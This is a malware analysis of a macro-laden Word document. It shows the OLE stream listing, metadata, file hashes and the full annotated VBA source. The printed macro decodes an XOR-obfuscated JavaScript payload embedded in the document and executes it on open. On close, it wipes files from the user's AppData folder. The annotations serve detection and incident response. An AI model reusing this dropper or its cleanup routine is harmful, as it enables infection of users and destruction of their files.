- --------------------------------------------------------------------
- Maldoc Hash: 49b367ac261a722a7c2bbbc328c32545
- --------------------------------------------------------------------
- 'Root Entry' (root) 13312 bytes
- {00020906-0000-0000-C000-000000000046}
- '\x01CompObj' (stream) 114 bytes
- '\x05DocumentSummaryInformation' (stream) 284 bytes
- '\x05SummaryInformation' (stream) 392 bytes
- '1Table' (stream) 8017 bytes
- 'Data' (stream) 4096 bytes
- 'Macros' (storage)
- 'PROJECT' (stream) 483 bytes
- 'PROJECTwm' (stream) 65 bytes
- 'VBA' (storage)
- 'Module1' (stream) 7117 bytes
- 'ThisDocument' (stream) 1104 bytes
- '_VBA_PROJECT' (stream) 3467 bytes
- '__SRP_0' (stream) 2964 bytes
- '__SRP_1' (stream) 195 bytes
- '__SRP_2' (stream) 2717 bytes
- '__SRP_3' (stream) 290 bytes
- 'dir' (stream) 565 bytes
- 'ObjectPool' (storage)
- '_1541577328' (storage)
- {0003000C-0000-0000-C000-000000000046}
- '\x01CompObj' (stream) 76 bytes
- '\x01Ole10Native' (stream) 20301 bytes
- '\x03EPRINT' (stream) 5000 bytes
- '\x03ObjInfo' (stream) 6 bytes
- 'WordDocument' (stream) 133755 bytes
- ['\x05DocumentSummaryInformation']: properties
- 1 1252
- 5 15
- 6 4
- 11 False
- 12 None
- 13 None
- 15 b'Olymp'
- 16 False
- 17 2144
- 19 False
- 22 False
- 23 917504
- ['\x05SummaryInformation']: properties
- 1 1252
- 2 b''
- 3 b''
- 4 b'user'
- 5 b''
- 7 b'Normal.dotm'
- 8 b'John'
- 9 b'11'
- 10 1601-01-01 00:08:00
- 12 2016-11-25 19:04:00
- 13 2016-11-25 20:04:00
- 14 1
- 15 320
- 16 1828
- 18 b'Microsoft Office Word'
- 19 0
- Modification/Creation times of all directory entries:
- - Root Entry: mtime=2016-11-25 20:04:23.969000 ctime=None
- - Data: mtime=None ctime=None
- - WordDocument: mtime=None ctime=None
- - ObjectPool: mtime=2016-11-25 20:04:23.969000 ctime=2016-11-25 20:04:23.694000
- - _1541577328: mtime=2016-11-25 20:04:23.694000 ctime=2016-11-25 20:04:23.694000
- - EPRINT: mtime=None ctime=None
- - CompObj: mtime=None ctime=None
- - ObjInfo: mtime=None ctime=None
- - Ole10Native: mtime=None ctime=None
- - 1Table: mtime=None ctime=None
- - SummaryInformation: mtime=None ctime=None
- - DocumentSummaryInformation: mtime=None ctime=None
- - Macros: mtime=2016-11-25 20:04:23.696000 ctime=2016-11-25 20:04:23.696000
- - VBA: mtime=2016-11-25 20:04:23.696000 ctime=2016-11-25 20:04:23.696000
- - dir: mtime=None ctime=None
- - Module1: mtime=None ctime=None
- - __SRP_0: mtime=None ctime=None
- - __SRP_1: mtime=None ctime=None
- - __SRP_2: mtime=None ctime=None
- - __SRP_3: mtime=None ctime=None
- - ThisDocument: mtime=None ctime=None
- - _VBA_PROJECT: mtime=None ctime=None
- - PROJECT: mtime=None ctime=None
- - PROJECTwm: mtime=None ctime=None
- - CompObj: mtime=None ctime=None
- Properties from SummaryInformation stream:
- - codepage: 1252
- - title: b''
- - subject: b''
- - author: b'user'
- - keywords: b''
- - comments: None
- - template: b'Normal.dotm'
- - last_saved_by: b'John'
- - revision_number: b'11'
- - total_edit_time: 480
- - last_printed: None
- - create_time: datetime.datetime(2016, 11, 25, 19, 4)
- - last_saved_time: datetime.datetime(2016, 11, 25, 20, 4)
- - num_pages: 1
- - num_words: 320
- - num_chars: 1828
- - thumbnail: None
- - creating_application: b'Microsoft Office Word'
- - security: 0
- Properties from DocumentSummaryInformation stream:
- - codepage_doc: 1252
- - category: None
- - presentation_target: None
- - bytes: None
- - lines: 15
- - paragraphs: 4
- - slides: None
- - notes: None
- - hidden_slides: None
- - mm_clips: None
- - scale_crop: False
- - heading_pairs: None
- - titles_of_parts: None
- - manager: None
- - company: b'Olymp'
- - links_dirty: False
- - chars_with_spaces: 2144
- - unused: None
- - shared_doc: False
- - link_base: None
- - hlinks: None
- - hlinks_changed: False
- - version: 917504
- - dig_sig: None
- - content_type: None
- - content_status: None
- - language: None
- - doc_version: None
- Root entry name: "Root Entry"
- This is a Word document.
- type of stream 'WordDocument': 2
- size : 133755
- ---------------------------------------------------------------------
- maintools.js EzZETcSXyKAdF_e5I2i1
- ----------------------------------------------------------------------
- Package Name : picture.jpg
- Package Name Unicode : picture.jpg
- Original File Path : C:\Users\John\Pictures\picture.jpg
- Original File Path Unicode : C:\Users\John\Pictures\picture.jpg
- Save File Path : C:\Users\John\AppData\Local\Temp\picture.jpg
- Save File Path Unicode : C:\Users\John\AppData\Local\Temp\picture.jpg
- Content Size : 19.53 KB
- Content : 91d8907e81b02b72a82e14d57dc26aff
- -------------------------------------------------------------------------
- ' Module-level state shared between AutoOpen and AutoClose:
- '   OBKHLrC3vEDjVL  - full path of the dropped script; assigned in AutoOpen, deleted in AutoClose
- '   B8qen2T433Ds1bW - drop directory derived from %APPDATA%; assigned in AutoOpen, wiped in AutoClose
- Public OBKHLrC3vEDjVL As String
- Public B8qen2T433Ds1bW As String
- ' In-place XOR decoder for the payload carved out of the document by AutoOpen.
- ' Each byte is XORed with a one-byte rolling key that starts at 45 and is
- ' advanced after every byte as key = (key Xor 99) Xor (i Mod 254).
- ' The first argument is modified in place; the second is the number of bytes
- ' to process. Always returns True, so the return value carries no error
- ' information. The loop index 'i' is never declared; no Option Explicit is
- ' visible in this listing.
- Function Q7JOhn5pIl648L6V43V(EjqtNRKMRiVtiQbSblq67() As Byte, M5wI32R3VF2g5B21EK4d As Long) As Boolean
- Dim THQNfU76nlSbtJ5nX8LY6 As Byte ' rolling key
- THQNfU76nlSbtJ5nX8LY6 = 45 ' initial key value
- For i = 0 To M5wI32R3VF2g5B21EK4d - 1
- EjqtNRKMRiVtiQbSblq67(i) = EjqtNRKMRiVtiQbSblq67(i) Xor THQNfU76nlSbtJ5nX8LY6
- ' Key schedule: both operands are below 256, so the result still fits the Byte.
- THQNfU76nlSbtJ5nX8LY6 = ((THQNfU76nlSbtJ5nX8LY6 Xor 99) Xor (i Mod 254))
- Next i
- Q7JOhn5pIl648L6V43V = True
- End Function
- ' Runs automatically when the document is closed: anti-forensic cleanup.
- ' Deletes the dropped script and then force-deletes every file in the drop
- ' directory (%APPDATA%\Microsoft\Windows, or %APPDATA% as the fallback chosen
- ' in AutoOpen), which also removes any unrelated user files stored there.
- ' All errors are suppressed, so nothing is logged or surfaced on failure.
- ' NOTE(review): if AutoOpen did not run in this session, B8qen2T433Ds1bW is
- ' empty and the delete pattern degenerates to "\*.*" - confirm how
- ' FileSystemObject resolves that before relying on it in an IR timeline.
- Sub AutoClose()
- On Error Resume Next
- Kill OBKHLrC3vEDjVL ' remove the dropped maintools.js
- On Error Resume Next
- Set R7Ks7ug4hRR2weOy7 = CreateObject("Scripting.FileSystemObject")
- R7Ks7ug4hRR2weOy7.DeleteFile B8qen2T433Ds1bW & "\*.*", True ' force flag: read-only files are deleted too
- Set R7Ks7ug4hRR2weOy7 = Nothing
- End Sub
- ' Runs automatically when the document is opened. Reads the document's own
- ' bytes from disk, locates an 80-character marker string with VBScript
- ' RegExp, carves the 16828 bytes that follow it, XOR-decodes them with
- ' Q7JOhn5pIl648L6V43V, writes the result to
- ' %APPDATA%\Microsoft\Windows\maintools.js (or %APPDATA%\maintools.js) and
- ' launches it through WScript.Shell with the argument EzZETcSXyKAdF_e5I2i1.
- ' Detection points grounded in this code: an Office process writing a .js
- ' file under %APPDATA%\Microsoft\Windows, and an Office process creating
- ' WScript.Shell / spawning a script host. The input file handle opened on
- ' NEnrKxf8l511 is never closed on either the success or the error path.
- Sub AutoOpen()
- On Error GoTo MnOWqnnpKXfRO
- Dim NEnrKxf8l511
- Dim N18Eoi6OG6T2rNoVl41W As Long
- Dim M5wI32R3VF2g5B21EK4d As Long
- N18Eoi6OG6T2rNoVl41W = FileLen(ActiveDocument.FullName) ' size of this document on disk
- NEnrKxf8l511 = FreeFile
- Open (ActiveDocument.FullName) For Binary As #NEnrKxf8l511 ' open the document itself as a binary file
- Dim E2kvpmR17SI() As Byte
- ReDim E2kvpmR17SI(N18Eoi6OG6T2rNoVl41W) ' 0..N, i.e. one byte more than the file length
- Get #NEnrKxf8l511, 1, E2kvpmR17SI ' read the whole file starting at position 1
- Dim KqG31PcgwTc2oL47hjd7Oi As String
- ' Convert the raw bytes to a string so the RegExp object can search them;
- ' the match index is then used as a byte offset into the file below.
- KqG31PcgwTc2oL47hjd7Oi = StrConv(E2kvpmR17SI, vbUnicode)
- Dim N34rtRBIU3yJO2cmMVu, I4j833DS5SFd34L3gwYQD
- Dim VUy5oj112fLw51h6S
- Set VUy5oj112fLw51h6S = CreateObject("vbscript.regexp")
- ' 80-character marker that precedes the embedded payload; a useful static signature.
- VUy5oj112fLw51h6S.Pattern = "MxOH8pcrlepD3SRfF5ffVTy86Xe41L2qLnqTd5d5R7Iq87mWGES55fswgG84hIRdX74dlb1SiFOkR1Hh"
- Set I4j833DS5SFd34L3gwYQD = VUy5oj112fLw51h6S.Execute(KqG31PcgwTc2oL47hjd7Oi)
- Dim Y5t4Ul7o385qK4YDhr
- If I4j833DS5SFd34L3gwYQD.Count = 0 Then
- GoTo MnOWqnnpKXfRO ' marker absent: give up silently
- End If
- ' Only the first match is used; its 0-based index becomes the carve offset.
- For Each N34rtRBIU3yJO2cmMVu In I4j833DS5SFd34L3gwYQD
- Y5t4Ul7o385qK4YDhr = N34rtRBIU3yJO2cmMVu.FirstIndex
- Exit For
- Next
- Dim Wk4o3X7x1134j() As Byte
- Dim KDXl18qY4rcT As Long
- KDXl18qY4rcT = 16827 ' payload length minus one (array is 0..16827)
- ReDim Wk4o3X7x1134j(KDXl18qY4rcT)
- ' Read the payload from the 1-based file position just past the 80-byte marker.
- Get #NEnrKxf8l511, Y5t4Ul7o385qK4YDhr + 81, Wk4o3X7x1134j
- ' The decoder always returns True, so this error branch is never taken.
- If Not Q7JOhn5pIl648L6V43V(Wk4o3X7x1134j(), KDXl18qY4rcT + 1) Then
- GoTo MnOWqnnpKXfRO
- End If
- ' Choose the drop directory: %APPDATA%\Microsoft\Windows if it exists, else %APPDATA%.
- B8qen2T433Ds1bW = Environ("appdata") & "\Microsoft\Windows"
- Set R7Ks7ug4hRR2weOy7 = CreateObject("Scripting.FileSystemObject")
- If Not R7Ks7ug4hRR2weOy7.FolderExists(B8qen2T433Ds1bW) Then
- B8qen2T433Ds1bW = Environ("appdata")
- End If
- Set R7Ks7ug4hRR2weOy7 = Nothing
- Dim K764B5Ph46Vh
- K764B5Ph46Vh = FreeFile
- OBKHLrC3vEDjVL = B8qen2T433Ds1bW & "\" & "maintools.js" ' dropped file path (module-level, used by AutoClose)
- Open (OBKHLrC3vEDjVL) For Binary As #K764B5Ph46Vh
- Put #K764B5Ph46Vh, 1, Wk4o3X7x1134j ' write the decoded payload
- Close #K764B5Ph46Vh
- Erase Wk4o3X7x1134j ' drop the decoded bytes from memory
- ' Execute the dropped script; the quoted path is followed by a fixed argument.
- Set R66BpJMgxXBo2h = CreateObject("WScript.Shell")
- R66BpJMgxXBo2h.Run """" + OBKHLrC3vEDjVL + """" + " EzZETcSXyKAdF_e5I2i1"
- ActiveDocument.Save
- Exit Sub
- ' Error handler: closes the output file (K764B5Ph46Vh may be unassigned here)
- ' and saves the document, masking whatever failed.
- MnOWqnnpKXfRO:
- Close #K764B5Ph46Vh
- ActiveDocument.Save
- End Sub
- --------------------------------------------------
- Malware Drop:
- --------------------------------------------------
- C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3C07F9B5.emf
- File Type: Windows Enhanced Metafile (EMF) image data version 0x10000
- MD5: EB10732AA3F3BB122DC9452917A62FA1
- SHA1: 19EE431B257833CBCA0868DCA5BCE19A81205DC5
- SHA-256: 750987BD6026CC8C515D0B6D65FFBE5BCBF7824EE56E82128D220EEF86390874
- SHA-512: 6043E5CA7627CED98A2785E2E103D2735E588DA0BA7ABA64FA9906ACB5505C4EFCF4D02F44A8C3B506C14D8AB4955192C49EAEF23A250AB287A581B3254C7C36
- C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\61B24A8B.emf
- File Type: Windows Enhanced Metafile (EMF) image data version 0x10000
- MD5: FDBBE99A5DD164B403945E6A98434CC1
- SHA1: 16A5869904B7A7C54B0262B1B83B5C4B36F581EB
- SHA-256: D416447FB0A6AA8F66CB9C943B7FFDA365CE56D2AD8AC12AC0154EF8A52D1CA0
- SHA-512: 6A608C28D41A9A09E4E0B9BE8E3EFC88BAAD44D0F92708176FB76B9900F46AC3D3F4C9C45D0A694D028F129085EBE8B2C2A80EB9308799B6403C69178CE3A83B
- C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9C92CC32.emf
- File Type: Windows Enhanced Metafile (EMF) image data version 0x10000
- MD5: FDBBE99A5DD164B403945E6A98434CC1
- SHA1: 16A5869904B7A7C54B0262B1B83B5C4B36F581EB
- SHA-256: D416447FB0A6AA8F66CB9C943B7FFDA365CE56D2AD8AC12AC0154EF8A52D1CA0
- SHA-512: 6A608C28D41A9A09E4E0B9BE8E3EFC88BAAD44D0F92708176FB76B9900F46AC3D3F4C9C45D0A694D028F129085EBE8B2C2A80EB9308799B6403C69178CE3A83B
- C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{570A205C-645C-4995-BCAD-8D4566A2D524}.tmp
- File Type: FoxPro FPT, blocks size 0, next free block index 218103808, 1st used item "\375"
- MD5: 5D4D94EE7E06BBB0AF9584119797B23A
- SHA1: DBB111419C704F116EFA8E72471DD83E86E49677
- SHA-256: 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
- SHA-512: 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
- C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B98AD5AC-9AA1-42F5-81F6-596A6B184300}.tmp
- File Type: data
- MD5: 2395DEC0A691F71650A4095EB5E05A34
- SHA1: 56903ED3513DAE0E1ABAFF66A2BB97B4D49B9C9E
- SHA-256: EEAD99619FE079B2DBFBF25A674C8D475B37E208AA2CEE428AFC488BC662FD09
- SHA-512: B2DDFEBEB9609F80F9843BC59F6E8B94E3A0F7DC158A6269FEB3199289D3FE784DD820B2B3021F5D24542B11C8E6A9EF29342AFBE8C09D87540FB1F8B87AE5AD
- C:\Users\user\AppData\Local\Microsoft\Windows\maintools.js
- File Type: ASCII text, with very long lines, with CRLF line terminators
- MD5: 5EA3FD094B69E9E00894842F95FD5D85
- SHA1: 318F06FF16CA0FD98FEBE2A777064F0A428163C3
- SHA-256: 3A065547ADB0AFC63E318C2FA1F682108664E602934490A898C3DE1B23975628
- SHA-512: 3E406F5965481348F937D5B0E5433486B727D4F782AC4D67E6898949E3F13ADF5DB152127D1635D733CA4AE5E5A0741656F27A350C3A82A2BF4854E8B7831C02
- Malicious: false
- C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\FJv6MQfMYp.LNK
- File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Sep 24 14:00:27 2017, mtime=Sun Sep 24 14:00:27 2017, atime=Wed Oct 4 14:15:38 2017, length=201216, window=hide
- MD5: 9F3F92427821D76F074286502717BD32
- SHA1: 206DDA573C78EF1900DFAAEFDBD4D82C851AEEA5
- SHA-256: 311F47C14B793048FEE343B45BAF8AB1FD2144B489988C8689AD18F15374AD8A
- SHA-512: 828675605CC6D8460252D92D6423C5202422F8C1A38CCCD31E1EDE402055A2D852E446723E3ACA6A70BE84F2B6FB74A1817D31BE36FC147E5EBF7DC05D4F17CF
- C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
- File Type: ASCII text, with CRLF line terminators
- MD5: 127D8F99975C8FA1D0974D8191BA7A52
- SHA1: 77943D3D71FA1F37C3692A1F38052E87E3BEA892
- SHA-256: 394D91597EF0C448F9D4B843F7DF3F445549FA9EE4B4B65955A8A709FC261AC0
- SHA-512: E24D8C5D8ACB45CAA8A60E2F993BAE0AD8A9D03EE545AE8647DE1404224FE636DFE4EC7A2D84223F773B940CC36F264CFD32EDDB5C7D3DCD8260A1D0CAEAD3A0
- C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
- File Type: data
- MD5: 3E7BD24815610B9CFB276BECD6CE969F
- SHA1: 55D998570D5B808657E7C140888B339F657E15C4
- SHA-256: 0D1CF856000A144E9D320940FA37FFD38C9B45A19A149513D70A31EAD7F34593
- SHA-512: 47F506312D879F3FAF033BEF23EC3AA67E7ADD90AFD85DE82BD492FCE41D04AF8724CEF38FB7823C0E3053777E1FA62183BAC9C51409F44D219365B94043CBC5
- C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
- File Type: Little-endian UTF-16 Unicode text, with no line terminators
- MD5: F3B25701FE362EC84616A93A45CE9998
- SHA1: D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
- SHA-256: B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
- SHA-512: 98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
- C:\Users\user\AppData\Roaming\Microsoft\Windows\maintools.js
- File Type: ASCII text, with very long lines, with CRLF line terminators
- MD5: 5EA3FD094B69E9E00894842F95FD5D85
- SHA1: 318F06FF16CA0FD98FEBE2A777064F0A428163C3
- SHA-256: 3A065547ADB0AFC63E318C2FA1F682108664E602934490A898C3DE1B23975628
- SHA-512: 3E406F5965481348F937D5B0E5433486B727D4F782AC4D67E6898949E3F13ADF5DB152127D1635D733CA4AE5E5A0741656F27A350C3A82A2BF4854E8B7831C02
- C:\Users\user\Desktop\~$v6MQfMYp.doc
- File Type: data
- MD5: 3E7BD24815610B9CFB276BECD6CE969F
- SHA1: 55D998570D5B808657E7C140888B339F657E15C4
- SHA-256: 0D1CF856000A144E9D320940FA37FFD38C9B45A19A149513D70A31EAD7F34593
- SHA-512: 47F506312D879F3FAF033BEF23EC3AA67E7ADD90AFD85DE82BD492FCE41D04AF8724CEF38FB7823C0E3053777E1FA62183BAC9C51409F44D219365B94043CBC5